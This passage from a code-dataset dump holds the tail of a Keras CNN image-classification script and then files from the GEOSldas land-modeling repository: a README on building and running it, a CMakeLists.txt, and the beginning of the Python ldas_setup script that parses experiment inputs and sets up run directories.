"src_encoding": "UTF-8",
"text": "from keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nclassifier=Sequential()\n#convolution\nclassifier.add(Convolution2D(32,3,3,input_shape=(64,64,3),activation='relu'))\n#max pooling\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\nclassifier.add(Convolution2D(32,3,3,activation='relu'))\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\n#Flattening\n\n\nclassifier.add(Flatten())\n#Hidden and output layers\nclassifier.add(Dense(units=128, activation='relu'))\nclassifier.add(Dense(units=1,activation='sigmoid'))\nclassifier.compile(optimizer='adam',loss= 'binary_crossentropy',metrics=['accuracy'])\nfrom keras.preprocessing.image import ImageDataGenerator\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_set = train_datagen.flow_from_directory(\n 'C:\\\\Users\\\\aksha\\\\Documents\\\\Machine_Learning_AZ_Template_Folder\\\\Machine Learning A-Z Template Folder\\\\Part 8 - Deep Learning\\\\Section 40 - Convolutional Neural Networks (CNN)\\\\Convolutional_Neural_Networks\\\\dataset\\\\training_set',\n target_size=(64, 64),\n batch_size=32,\n class_mode='binary')\n\ntest_set = test_datagen.flow_from_directory(\n 'C:\\\\Users\\\\aksha\\\\Documents\\\\Machine_Learning_AZ_Template_Folder\\\\Machine Learning A-Z Template Folder\\\\Part 8 - Deep Learning\\\\Section 40 - Convolutional Neural Networks (CNN)\\\\Convolutional_Neural_Networks\\\\dataset\\\\test_set',\n target_size=(64, 64),\n batch_size=32,\n class_mode='binary')\nfrom PIL import Image\nclassifier.fit_generator(\n train_set,\n steps_per_epoch=8000,\n epochs=25,\n validation_data=test_set,\n nb_val_samples=2000)\n\n\n\n\n"
}
] | 1 |
manuelagirotto/GEOSldas | https://github.com/manuelagirotto/GEOSldas | cbb81b2fa1de9cdaaf82814bda843d6f6b91cb04 | 2f18c53019faaf8f5c277fd6841b5acc0461e031 | 01f4ab6c9e9fc965122523ba09ab14bc4de20d6b | refs/heads/main | 2022-11-06T06:16:04.207167 | 2020-06-26T19:02:40 | 2020-06-26T19:02:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6541776061058044,
"alphanum_fraction": 0.6596103310585022,
"avg_line_length": 31.530487060546875,
"blob_id": "b44f9628dee23e8792442406a04322ebd0c41279",
"content_id": "c2015d92016c3bb4b50d8484fc0734a5f3365825",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5338,
"license_type": "no_license",
"max_line_length": 266,
"num_lines": 164,
"path": "/README.md",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "# GEOSldas Fixture\n\nThis document explains how to build, set up, and run the GEOS land modeling and data assimilation system (`GEOSldas`).\n\n## How to Build GEOSldas\n\n### Step 1: Load the Build Modules \n\nLoad the `GEOSenv` module provided by the GMAO Software Infrastructure team. It contains the latest `git`, `CMake`, and `manage_externals` modules and must be loaded in any interactive window that is used to check out and build the model.\n\n```\nmodule use -a (path)\nmodule load GEOSenv\n```\n\nwhere `(path)` depends on the computer and operating system: \n\n| System | Path |\n| ------------- |---------------------------------------------------|\n| NCCS SLES11 | `/discover/swdev/gmao_SIteam/modulefiles-SLES11` |\n| NCCS SLES12 | `/discover/swdev/gmao_SIteam/modulefiles-SLES12` |\n| NAS | `/nobackup/gmao_SIteam/modulefiles` |\n| GMAO desktops | `/ford1/share/gmao_SIteam/modulefiles` |\n\n\nFor NCCS, you can add the following to your `.cshrc`:\n```\nif ( ! -f /etc/os-release ) then\n module use -a /discover/swdev/gmao_SIteam/modulefiles-SLES11\nelse\n module use -a /discover/swdev/gmao_SIteam/modulefiles-SLES12\nendif\nmodule load GEOSenv\n```\n\n\n### Step 2: Obtain the Model\n\nFor development work, clone the _entire_ repository and use the `develop` branch as your starting point (equivalent to the `UNSTABLE` tag in the old CVS repository):\n```\ngit clone -b develop [email protected]:GEOS-ESM/GEOSldas.git\n```\nFor science runs, you can also obtain a specific tag or branch _only_ (as opposed to the _entire_ repository), e.g.: \n```\ngit clone -b v17.9.0-beta.3 --single-branch [email protected]:GEOS-ESM/GEOSldas.git\n```\n\n\n### Step 3: Build the Model\n\nTo build the model in a single step, do the following:\n```\ncd ./GEOSldas\nparallel_build.csh\n``` \nfrom a head node. Doing so will checkout all the external repositories of the model and build it. When done, the resulting model build will be found in `build/` and the installation will be found in `install/`, with setup scripts like `ldas_setup` in `install/bin`. \n\nTo obtain a build that is suitable for debugging, you can run `parallel_build.csh -debug`, which will build in `build-Debug/` and install in `install-Debug/`.\n\nSee below for how to build the model in multiple steps.\n\n---\n\n## How to Set Up and Run GEOSldas\n\na) Set up the job as follows:\n\n```\ncd (build_path)/GEOSldas/install/bin\nsource g5_modules\n./ldas_setup setup [-v] [--runmodel] (exp_path) (\"exe\"_input_filename) (\"bat\"_input_filename)\n``` \n\nwhere\n\n| Parameter | Description |\n| -----------------------|----------------------------------------------------------|\n| `build_path` | path to build directory |\n| `exp_path` | path of desired experiment directory |\n| `\"exe\"_input_filename` | filename (with path) of \"experiment\" inputs |\n| `\"bat\"_input_filename` | filename (with path) of \"batch\" (job scheduler) inputs |\n\nThe three arguments for `ldas_setup` are positional and must be ordered as indicated above.\n\nThe latter two files contain essential information about the experiment setup. \nSample files can be generated as follows:\n``` \nldas_setup sample --exeinp > YOUR_exeinp.txt\nldas_setup sample --batinp > YOUR_exeinp.txt\n```\n\nEdit these sample files following the examples and comments within the sample files. \n\nThe ldas_setup script creates a run directory and other directories at:\n`[exp_path]/[exp_name]`\n\nConfiguration input files will be created at:\n`[exp_path]/[exp_name]/run`\n\nFor more options and documentation, use any of the following:\n```\nldas_setup -h\nldas_setup sample -h\nldas_setup setup -h\n```\n\nb) Configure the experiment output by editing the ```./run/HISTORY.rc``` file as needed.\n\nc) Run the job:\n```\ncd [exp_path]/[exp_name]/run/\nsbatch lenkf.j\n```\n\nFor more information, see the README files and ppt tutorial in `./src/Applications/LDAS_App/doc/`.\n\n-----------------------------------------------------------------------------------\n\n## Additional Information\n\n### How to Build the Model in Multiple Steps\n\nThe steps detailed below are essentially those performed by `parallel_build.csh` in Step 3 above. Either method should yield identical builds.\n\n##### Checkout externals\n```\ncd GEOSldas\ncheckout_externals\n```\n\n##### Load Compiler, MPI Stack, and Baselibs\nOn tcsh:\n```\nsource @env/g5_modules\n```\nor on bash:\n```\nsource @env/g5_modules.sh\n```\n\n##### Create Build Directory\nWe currently do not allow in-source builds of GEOSldas. So we must make a directory:\n```\nmkdir build\n```\nThe advantages of this is that you can build both a Debug and Release version with the same clone if desired.\n\n##### Run CMake\nCMake generates the Makefiles needed to build the model.\n```\ncd build\ncmake .. -DBASEDIR=$BASEDIR/Linux -DCMAKE_Fortran_COMPILER=ifort -DCMAKE_INSTALL_PREFIX=../install\n```\nThis will install to a directory parallel to your `build` directory. If you prefer to install elsewhere change the path in:\n```\n-DCMAKE_INSTALL_PREFIX=<path>\n```\nand CMake will install there.\n\n##### Build and Install with Make\n```\nmake -j6 install\n```\nIf you are using SLES12 at NCCS, you **should** run `make -j6 install` on an interactive _compute_ node. \n\n"
},
{
"alpha_fraction": 0.755162239074707,
"alphanum_fraction": 0.76106196641922,
"avg_line_length": 18.941177368164062,
"blob_id": "d435220e046ab1301c594a26ac35048bc4bb54ef",
"content_id": "347cc295e5fd603c0103b57633dfc423d6ab7aed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 17,
"path": "/src/Components/GEOSldas_GridComp/CMakeLists.txt",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "esma_set_this ()\n\nesma_add_subdirectories (@GEOSgcm_GridComp )\n\nset (alldirs\n GEOSmetforce_GridComp\n GEOSlandpert_GridComp\n GEOSens_GridComp\n GEOSlandassim_GridComp\n )\n\nesma_add_library(${this}\n SRCS GEOS_LdasGridComp.F90\n SUBCOMPONENTS ${alldirs}\n SUBDIRS Shared\n DEPENDENCIES GEOSland_GridComp MAPL_Base\n INCLUDES ${INC_ESMF})\n"
},
{
"alpha_fraction": 0.4890343248844147,
"alphanum_fraction": 0.4971538484096527,
"avg_line_length": 42.5869026184082,
"blob_id": "b7f40cc295124ea2915cfbaa55ae307f3eff150e",
"content_id": "ad68cd268000ba78645f6e00ac55fb2e9647cf43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69216,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 1588,
"path": "/src/Applications/LDAS_App/ldas_setup",
"repo_name": "manuelagirotto/GEOSldas",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport sys\nimport glob\nimport copy\nimport linecache\nimport shutil\nimport argparse\nimport fileinput\nimport time\nimport subprocess as sp\nfrom dateutil import rrule\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom collections import OrderedDict\nfrom dateutil.relativedelta import relativedelta\n\n\n\"\"\"\nThis script is intended to be run from any installed directory with GEOSldas.x and ldas_setup\n(The default setup is ../install/bin)\n\"\"\"\n\n\nclass LDASsetup:\n\n def __init__(self, cmdLineArgs):\n \"\"\"\n \"\"\"\n # ------\n # Required exe input fields\n # These fields are needed to pre-compute exp dir structure\n # ------\n rqdExeInpKeys = ['EXP_ID', 'EXP_DOMAIN', 'NUM_LDAS_ENSEMBLE', \n 'BEG_DATE', 'END_DATE','RESTART_PATH',\n 'RESTART_DOMAIN','RESTART_ID','MET_TAG','MET_PATH','FORCE_DTSTEP','BCS_PATH']\n rqdExeInpKeys_rst = ['EXP_ID', 'EXP_DOMAIN', 'NUM_LDAS_ENSEMBLE', \n 'BEG_DATE', 'END_DATE','MET_TAG','MET_PATH','FORCE_DTSTEP','BCS_PATH']\n\n # These keywords are excluded from LDAS.rc (i.e., only needed in pre- or post-processing)\n self.NoneLDASrcKeys=['EXP_ID', 'EXP_DOMAIN',\n 'BEG_DATE', 'END_DATE','RESTART','RESTART_PATH',\n 'RESTART_DOMAIN','RESTART_ID','BCS_PATH','TILING_FILE','GRN_FILE','LAI_FILE','NIRDF_FILE',\n 'VISDF_FILE','CATCH_DEF_FILE','NDVI_FILE',\n 'NML_INPUT_PATH','HISTRC_FILE','RST_FROM_GLOBAL','JOB_SGMT','NUM_SGMT','POSTPROC_HIST',\n 'MINLON','MAXLON','MINLAT','MAXLAT','BLACK_FILE','WHITE_FILE','MWRTM_FILE','GRIDNAME']\n\n\n # ------\n # Required resource manager input fields\n # ------\n rqdRmInpKeys = ['rm_name', 'account', 'walltime', 'ntasks']\n # ------\n # Optional resource manager input fields\n # ------\n optSlurmInpKeys = ['job_name', 'constraint','qos']\n\n # ------\n # ./ldsetup.py sample ...\n # ------\n if 'exeinp' in cmdLineArgs:\n # sample sub-command\n # by construction, we can have\n # either: {'exeinp': False, 'batinp': 'lasgh'} <-- 'lasgh'???\n # or: {'exeinp': True, 'batinp': None}\n if cmdLineArgs['exeinp']:\n _printExeInputKeys(rqdExeInpKeys)\n elif cmdLineArgs['batinp'] :\n _printRmInputKeys(rqdRmInpKeys, optSlurmInpKeys)\n else:\n raise Exception('not recognized option')\n sys.exit(0)\n\n # ------\n # ./ldsetup.py setup ...\n # ------\n # Instance variables\n self.exeinpfile = cmdLineArgs['exeinpfile']\n self.batinpfile = cmdLineArgs['batinpfile']\n self.exphome = cmdLineArgs['exphome'].rstrip('/')\n assert os.path.isdir(self.exphome) # exphome should exist\n self.verbose = cmdLineArgs['verbose']\n self.runmodel = cmdLineArgs['runmodel']\n if self.runmodel :\n print('\\n The option \"--runmodel\" is out of date, not necessary anymore. \\n')\n self.daysperjob = cmdLineArgs['daysperjob']\n self.monthsperjob = cmdLineArgs['monthsperjob']\n self.rqdExeInp = OrderedDict()\n self.rqdRmInp = OrderedDict()\n self.optRmInp = OrderedDict()\n self.rundir = None\n self.blddir = None\n self.blddirLn = None\n self.outdir = None\n self.out_path = None\n self.inpdir = None\n self.exefyl = None\n self.islocal = False\n self.catch = ''\n self.has_mwrtm = False\n self.assim = False\n self.has_landassim_seed = False\n self.has_geos_pert = False\n self.has_ldassa_pert = False\n self.nSegments = 1\n self.perturb = 0\n self.first_ens_id = 0\n # ------\n # Read exe input file which is required to set up the dir\n # ------\n self.rqdExeInp = self._parseInputFile(cmdLineArgs['exeinpfile'])\n # verifing the required input\n if 'RESTART' not in self.rqdExeInp :\n self.rqdExeInp['RESTART'] = 1\n\n if self.rqdExeInp['RESTART'].isdigit() :\n if int(self.rqdExeInp['RESTART']) ==0 :\n rqdExeInpKeys = rqdExeInpKeys_rst\n self.rqdExeInp['RESTART_ID'] = \"none\"\n self.rqdExeInp['RESTART_DOMAIN'] = \"none\"\n self.rqdExeInp['RESTART_PATH'] = \"none\"\n else:\n if self.rqdExeInp['RESTART'] =='G' :\n rqdExeInpKeys = rqdExeInpKeys_rst\n self.rqdExeInp['RESTART_DOMAIN'] = \"none\"\n else:\n self.rqdExeInp['RESTART_ID'] = \"none\"\n self.rqdExeInp['RESTART_DOMAIN'] = \"none\"\n self.rqdExeInp['RESTART_PATH'] = \"none\"\n\n for key in rqdExeInpKeys :\n assert key in self.rqdExeInp,' \"%s\" is required in the input file %s' % (key,self.exeinpfile)\n\n # print rqd exe inputs\n if self.verbose:\n print '\\nInputs from execfile:\\n'\n _printdict(self.rqdExeInp)\n\n # nens is an integer and =1 for model run\n self.nens = int(self.rqdExeInp['NUM_LDAS_ENSEMBLE']) # fail if Nens's val is not int\n assert self.nens>0, 'NUM_LDAS_ENSEMBLE [%d] <= 0' % self.nens\n _mydir = self.exphome + '/' + self.rqdExeInp['EXP_ID']\n assert not os.path.isdir(_mydir), 'Dir [%s] already exists!' % _mydir\n _mydir = None\n self.first_ens_id = int(self.rqdExeInp.get('FIRST_ENS_ID',0))\n self.perturb = int(self.rqdExeInp.get('PERTURBATIONS',0))\n if self.nens > 1:\n self.perturb = 1\n self.ensdirs = ['ens%04d'%iens for iens in range(self.first_ens_id, self.nens + self.first_ens_id)]\n self.ensids = ['%04d'%iens for iens in range(self.first_ens_id, self.nens + self.first_ens_id)]\n if (self.nens == 1) :\n self.ensdirs_avg = self.ensdirs\n self.ensids=['']\n else :\n self.ensdirs_avg = self.ensdirs + ['ens_avg']\n\n ## convert date-time strings to datetime object\n ## start/end_time are converted to lists\n ## ensure end>start\n\n self.begDates=[]\n self.endDates=[]\n self.begDates.append(\n datetime.strptime(\n self.rqdExeInp['BEG_DATE'],\n '%Y%m%d %H%M%S'\n )\n )\n self.endDates.append(\n datetime.strptime(\n self.rqdExeInp['END_DATE'],\n '%Y%m%d %H%M%S'\n )\n )\n if self.rqdExeInp['RESTART'].isdigit() :\n if int(self.rqdExeInp['RESTART']) == 0 :\n print \"No restart file (cold restart): Forcing start date to January 1, 0z\"\n year = self.begDates[0].year\n self.begDates[0]=datetime(year =year,month=1,day =1,hour =0, minute= 0,second= 0)\n\n assert self.endDates[0]>self.begDates[0], \\\n 'END_DATE <= BEG_DATE'\n\n self.job_sgmt = []\n if 'JOB_SGMT' in self.rqdExeInp:\n self.job_sgmt.append(\"JOB_SGMT: \"+self.rqdExeInp['JOB_SGMT'])\n else:\n _datediff = relativedelta(self.endDates[0],self.begDates[0])\n self.rqdExeInp['JOB_SGMT'] = \"%04d%02d%02d %02d%02d%02d\" %(_datediff.years,\n _datediff.months,\n _datediff.days,\n _datediff.hours,\n _datediff.minutes,\n _datediff.seconds)\n self.job_sgmt.append(\"JOB_SGMT: \"+self.rqdExeInp['JOB_SGMT'])\n _years = int(self.rqdExeInp['JOB_SGMT'][0:4])\n _months = int(self.rqdExeInp['JOB_SGMT'][4:6])\n _days = int(self.rqdExeInp['JOB_SGMT'][6:8])\n assert self.rqdExeInp['JOB_SGMT'][8] == ' ' and self.rqdExeInp['JOB_SGMT'][9] != ' ', \"JOB_SGMT format is not right\"\n _hours = int(self.rqdExeInp['JOB_SGMT'][9:11])\n _mins = int(self.rqdExeInp['JOB_SGMT'][11:13])\n _seconds= int(self.rqdExeInp['JOB_SGMT'][13:15])\n\n if 'NUM_SGMT' not in self.rqdExeInp:\n self.rqdExeInp['NUM_SGMT'] = 1\n\n _difftime =timedelta(days = _years*365+_months*30+_days,hours = _hours,minutes=_mins,seconds=_seconds)\n _difftime = int(self.rqdExeInp['NUM_SGMT'])*_difftime\n print int(self.rqdExeInp['NUM_SGMT'])\n _d = self.begDates[0]\n _endDate = self.endDates[0]\n _d = _d + _difftime\n while _d < _endDate :\n print _difftime.days\n self.nSegments +=1\n print _d.year, _d.month, _d.day\n self.begDates.append(_d)\n self.endDates.insert(-1,_d)\n _d = _d+ _difftime\n\n # make sure path is path\n if self.rqdExeInp['BCS_PATH'][-1] != '/':\n self.rqdExeInp['BCS_PATH'] = self.rqdExeInp['BCS_PATH']+'/'\n if self.rqdExeInp['MET_PATH'][-1] != '/':\n self.rqdExeInp['MET_PATH'] = self.rqdExeInp['MET_PATH']+'/'\n if self.rqdExeInp['RESTART_PATH'][-1] != '/':\n self.rqdExeInp['RESTART_PATH'] = self.rqdExeInp['RESTART_PATH']+'/'\n\n # make sure catchment and vegdyn restart files ( at least one for each) exist\n if 'CATCH_DEF_FILE' not in self.rqdExeInp:\n self.rqdExeInp['CATCH_DEF_FILE']=self.rqdExeInp['BCS_PATH']+'clsm/catchment.def'\n assert os.path.isfile(self.rqdExeInp['CATCH_DEF_FILE']),\"[%s] file does not exist \" % self.rqdExeInp['CATCH_DEF_FILE']\n\n self.rqdExeInp['RST_FROM_GLOBAL'] = 1\n if self.rqdExeInp['RESTART'].isdigit() :\n if int(self.rqdExeInp['RESTART']) == 1 :\n _numg = int(linecache.getline(self.rqdExeInp['CATCH_DEF_FILE'], 1).strip())\n _numd = _numg\n ldas_domain = self.rqdExeInp['RESTART_PATH']+ \\\n self.rqdExeInp['RESTART_ID'] + \\\n '/output/'+self.rqdExeInp['RESTART_DOMAIN']+'/rc_out/'+self.rqdExeInp['RESTART_ID']+'.ldas_domain.txt'\n if os.path.isfile(ldas_domain) :\n _numd = int(linecache.getline(ldas_domain, 1).strip())\n \n if _numg != _numd : \n self.rqdExeInp['RST_FROM_GLOBAL'] = 0\n\n if int(self.rqdExeInp['RST_FROM_GLOBAL']) == 1 :\n self.rqdExeInp['TILING_FILE'] =glob.glob(self.rqdExeInp['BCS_PATH']+'*.til')[0]\n self.rqdExeInp['GRN_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'green_clim_*.data')[0]\n self.rqdExeInp['LAI_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'lai_clim_*.data')[0]\n self.rqdExeInp['NDVI_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'ndvi_clim_*.data')[0]\n self.rqdExeInp['NIRDF_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'nirdf_*.dat')[0]\n self.rqdExeInp['VISDF_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'visdf_*.dat')[0]\n else :\n inpdir=self.rqdExeInp['RESTART_PATH']+self.rqdExeInp['RESTART_ID']+'/input/'\n self.rqdExeInp['TILING_FILE'] =os.path.realpath(glob.glob(inpdir+'*tile.data')[0])\n self.rqdExeInp['GRN_FILE']= os.path.realpath(glob.glob(inpdir+'green*data')[0])\n self.rqdExeInp['LAI_FILE']= os.path.realpath(glob.glob(inpdir+'lai*data')[0])\n self.rqdExeInp['NDVI_FILE']= os.path.realpath(glob.glob(inpdir+'ndvi*data')[0])\n self.rqdExeInp['NIRDF_FILE']= os.path.realpath(glob.glob(inpdir+'nirdf*data')[0])\n self.rqdExeInp['VISDF_FILE']= os.path.realpath(glob.glob(inpdir+'visdf*data')[0])\n\n if self.rqdExeInp['RESTART'].isdigit() :\n if int(self.rqdExeInp['RESTART']) == 2 :\n self.rqdExeInp['RST_FROM_GLOBAL'] = 1\n ldas_domain = self.rqdExeInp['RESTART_PATH']+ \\\n self.rqdExeInp['RESTART_ID'] + \\\n '/output/'+self.rqdExeInp['RESTART_DOMAIN']+'/rc_out/'+self.rqdExeInp['RESTART_ID']+'.ldas_domain.txt'\n if os.path.isfile(ldas_domain) :\n _numd = int(linecache.getline(ldas_domain, 1).strip())\n self.rqdExeInp['TILING_FILE'] =glob.glob(self.rqdExeInp['BCS_PATH']+'*.til')[0]\n self.rqdExeInp['GRN_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'green_clim_*.data')[0]\n self.rqdExeInp['LAI_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'lai_clim_*.data')[0]\n self.rqdExeInp['NDVI_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'ndvi_clim_*.data')[0]\n self.rqdExeInp['NIRDF_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'nirdf_*.dat')[0]\n self.rqdExeInp['VISDF_FILE']= glob.glob(self.rqdExeInp['BCS_PATH']+'visdf_*.dat')[0] \n \n if 'GRIDNAME' not in self.rqdExeInp :\n tmptile =self.rqdExeInp['TILING_FILE']\n self.rqdExeInp['GRIDNAME'] = linecache.getline(tmptile, 3).strip()\n\n if 'LSM_CHOICE' not in self.rqdExeInp:\n self.rqdExeInp['LSM_CHOICE'] = 1\n\n if int(self.rqdExeInp['LSM_CHOICE']) == 1 :\n self.catch = 'catch'\n else :\n self.catch = 'catchcn'\n\n if 'POSTPROC_HIST' not in self.rqdExeInp:\n self.rqdExeInp['POSTPROC_HIST'] = 0\n\n if 'RUN_IRRIG' not in self.rqdExeInp:\n self.rqdExeInp['RUN_IRRIG'] = 0 \n\n if 'AEROSOL_DEPOSITION' not in self.rqdExeInp:\n self.rqdExeInp['AEROSOL_DEPOSITION'] = 0\n # default is global\n _domain_dic=OrderedDict()\n _domain_dic['MINLON']=-180.\n _domain_dic['MAXLON']= 180.\n _domain_dic['MINLAT']= -90.\n _domain_dic['MAXLAT']= 90.\n _domain_dic['BLACK_FILE']= \"''\"\n _domain_dic['WHITE_FILE']= \"''\"\n \n for key,val in _domain_dic.iteritems() :\n if key in self.rqdExeInp :\n _domain_dic[key]= self.rqdExeInp[key]\n fout =open('LDAS_domain_def.nml','w')\n fout.write('&domain_inputs\\n')\n for key,val in _domain_dic.iteritems() :\n keyn=(key+\" = \").ljust(16)\n valn = str(val)\n fout.write(keyn+ valn +'\\n')\n fout.write('/\\n')\n\n \n # make sure bcs files exist\n if self.rqdExeInp['RESTART'].isdigit() :\n if int(self.rqdExeInp['RESTART']) >= 1 :\n y4m2='Y%4d/M%02d' % (self.begDates[0].year, self.begDates[0].month)\n y4m2d2_h2m2='%4d%02d%02d_%02d%02d' % (self.begDates[0].year, self.begDates[0].month,\n self.begDates[0].day,self.begDates[0].hour,self.begDates[0].minute)\n tmpFile=self.rqdExeInp['RESTART_ID']+'.'+self.catch+'_internal_rst.'+y4m2d2_h2m2\n tmpRstDir=self.rqdExeInp['RESTART_PATH']+'/'.join([self.rqdExeInp['RESTART_ID'],'output',\n self.rqdExeInp['RESTART_DOMAIN'],'rs',self.ensdirs[0],y4m2])\n catchRstFile=tmpRstDir+'/'+tmpFile\n ldassa_tmp=self.rqdExeInp['RESTART_ID']+'.ens0000.'+self.catch+'_ldas_rst.'+y4m2d2_h2m2+'z.bin'\n ldassaCN_tmp=self.rqdExeInp['RESTART_ID']+'.ens0000.'+self.catch+'_ldas_rst.'+y4m2d2_h2m2+'z'\n LDASsa_catchRstFile=tmpRstDir+'/'+ldassa_tmp\n LDASsa_CNRstFile=tmpRstDir+'/'+ldassaCN_tmp\n \n assert os.path.isfile(catchRstFile) or os.path.isfile(LDASsa_catchRstFile) or os.path.isfile(LDASsa_CNRstFile), \\\n self.catch+'_internal_rst file [%s] or [%s] does not exist!' %(catchRstFile, LDASsa_catchRstFile)\n \n if int(self.rqdExeInp['RESTART']) == 1 :\n tmpFile=self.rqdExeInp['RESTART_ID']+'.vegdyn_internal_rst'\n tmpRstDir=self.rqdExeInp['RESTART_PATH']+'/'.join([self.rqdExeInp['RESTART_ID'],'output',\n self.rqdExeInp['RESTART_DOMAIN'],'rs',self.ensdirs[0]]) \n vegdynRstFile=tmpRstDir+'/'+tmpFile\n if not os.path.isfile(vegdynRstFile):\n assert int(self.rqdExeInp['RST_FROM_GLOBAL']) == 1, 'restart from LDASsa should be global'\n \n tmpFile=self.rqdExeInp['RESTART_ID']+'.landpert_internal_rst.'+y4m2d2_h2m2\n tmpRstDir=self.rqdExeInp['RESTART_PATH']+'/'.join([self.rqdExeInp['RESTART_ID'],'output',\n self.rqdExeInp['RESTART_DOMAIN'],'rs',self.ensdirs[0],y4m2])\n landpertRstFile=tmpRstDir+'/'+tmpFile\n if ( os.path.isfile(landpertRstFile)) :\n self.has_geos_pert = True\n else :\n ldassa_tmp=self.rqdExeInp['RESTART_ID']+'.ens0000.pert_ldas_rst.'+y4m2d2_h2m2+'z.bin'\n LDASsa_pertRstFile=tmpRstDir+'/'+ldassa_tmp\n if (os.path.isfile(LDASsa_pertRstFile)) :\n self.has_ldassa_pert = True\n \n # DEAL WITH mwRTM input from exec\n self.assim = True if self.rqdExeInp.get('LAND_ASSIM', 'NO').upper() == 'YES' else False\n # verify mwrtm file\n if 'MWRTM_FILE' in self.rqdExeInp :\n _tmpfile = self.rqdExeInp['MWRTM_FILE'].replace(\"'\",'').replace('\"','')\n if os.path.isfile(_tmpfile) :\n self.has_mwrtm = True\n self.rqdExeInp['MWRTM_FILE'] = _tmpfile \n else : \n assert not _tmpfile.strip(), ' MWRTM_FILE: %s should point to mwrtm param file'% _tmpfile\n del self.rqdExeInp['MWRTM_FILE']\n \n # DEAL WITH optional input from exec\n \n # ------\n # Read rm input file\n # Read (and pop from inpfile) the input required fields in to\n # self.rqdRmInp. Fields left in inpDictFromFile are then\n # read in to self.optRmInp\n # ------\n # re-using inpDictFromFile\n\n inpDictFromFile = self._parseInputFile(cmdLineArgs['batinpfile'])\n\n # REQUIRED inputs\n for key in rqdRmInpKeys:\n self.rqdRmInp[key] = inpDictFromFile.pop(key)\n\n # checks on rqd rm inputs\n ## for now, we only support SLURM\n assert self.rqdRmInp['rm_name'].upper() == 'SLURM'\n ## account and walltime should exist\n assert self.rqdRmInp['account']\n if cmdLineArgs['account'] != 'None':\n self.rqdRmInp['account'] = cmdLineArgs['account']\n assert self.rqdRmInp['walltime']\n ## ntasks is a +ve integer\n _ntasks = int(self.rqdRmInp['ntasks'])\n assert _ntasks>0\n self.rqdRmInp['ntasks'] = _ntasks\n _ntasks = None\n\n # print rqd rm inputs\n if self.verbose:\n print '\\n\\nRequired inputs for resource manager:'\n _printdict(self.rqdRmInp)\n\n # OPTIONAL inputs\n for key in inpDictFromFile:\n assert key in optSlurmInpKeys, \\\n 'unknown resource manager key [%s]' % key\n self.optRmInp[key] = inpDictFromFile[key]\n\n # print opt rm inputs\n if self.verbose:\n print '\\n\\nOptional inputs for resource manager:'\n _printdict(self.optRmInp)\n\n # ------\n # set top level directories \n # rundir, inpdir, outdir, blddir\n # executable\n # exefyl\n # ------\n\n cwd = os.getcwd()\n self.blddir = cwd.rsplit('/',1)[0]\n exefyl = '/bin/GEOSldas.x'\n tmp_execfyl= self.blddir+exefyl\n assert os.path.isfile(tmp_execfyl),\\\n 'Executable [%s] does not exist!' % tmp_execfyl\n\n tmp_expid = self.rqdExeInp['EXP_ID']\n tmp_expdir = os.path.abspath(self.exphome + '/' + self.rqdExeInp['EXP_ID'])\n self.rundir = tmp_expdir + '/run'\n self.inpdir = tmp_expdir + '/input'\n self.outdir = tmp_expdir + '/output'\n self.scratchdir = tmp_expdir + '/scratch'\n self.blddirLn = tmp_expdir + '/build'\n self.out_path = self.outdir+'/'+self.rqdExeInp['EXP_DOMAIN']\n self.bcsdir = self.outdir+'/'+self.rqdExeInp['EXP_DOMAIN']+'/rc_out/'\n self.rstdir = self.outdir+'/'+self.rqdExeInp['EXP_DOMAIN']+'/rs/'\n self.exefyl = self.blddirLn+exefyl\n\n tmp_expid = None\n tmp_expdir = None\n\n\n def _parseInputFile(self, inpfile):\n \"\"\"\n Private method: parse input file and return a dict of options\n Input: input file\n Output: dict\n \"\"\"\n\n inpdict = OrderedDict()\n errstr = \"line [%d] of [%s] is not in the form 'key: value'\"\n\n fin = open(inpfile, 'r')\n linenum = 0\n for line in fin:\n linenum += 1\n line = line.strip()\n # blank line\n if not line:\n continue\n if '\"GEOSldas=>\"' in line:\n continue\n # get \"GEOSldas=>\" default in GEOS_LandGrid.rc\n if 'GEOSldas=>' in line:\n line = line.split('GEOSldas=>')[1]\n # handle comments\n position = line.find('#')\n if position==0: # comment line\n continue\n if position>0: # strip out comment\n line = line[:position]\n # we expect a line to be of the form\n # key = value\n assert ':' in line, errstr % (linenum, inpfile)\n\n key, val = line.split(':',1)\n key = key.strip()\n val = val.strip()\n if not key or not val:\n print \"WARNING: \" + errstr % (linenum, inpfile)\n continue\n #raise Exception(errstr % (linenum, inpfile))\n if key in inpdict:\n raise Exception('Duplicate key [%s] in [%s]' % (key, inpfile))\n inpdict[key] = val.strip()\n fin.close()\n\n return inpdict\n\n\n def _mkdir_p(self,path):\n \"\"\"\n Private method: implement 'mkdir -p' functionality\n \"\"\"\n\n if os.path.isdir(path):\n return\n else:\n os.makedirs(path)\n\n def createDirStructure(self):\n \"\"\"\n Create required dir structure\n \"\"\"\n\n status = False\n\n # shorthands\n _nens = self.nens\n\n # run/inp/wrk dirs\n 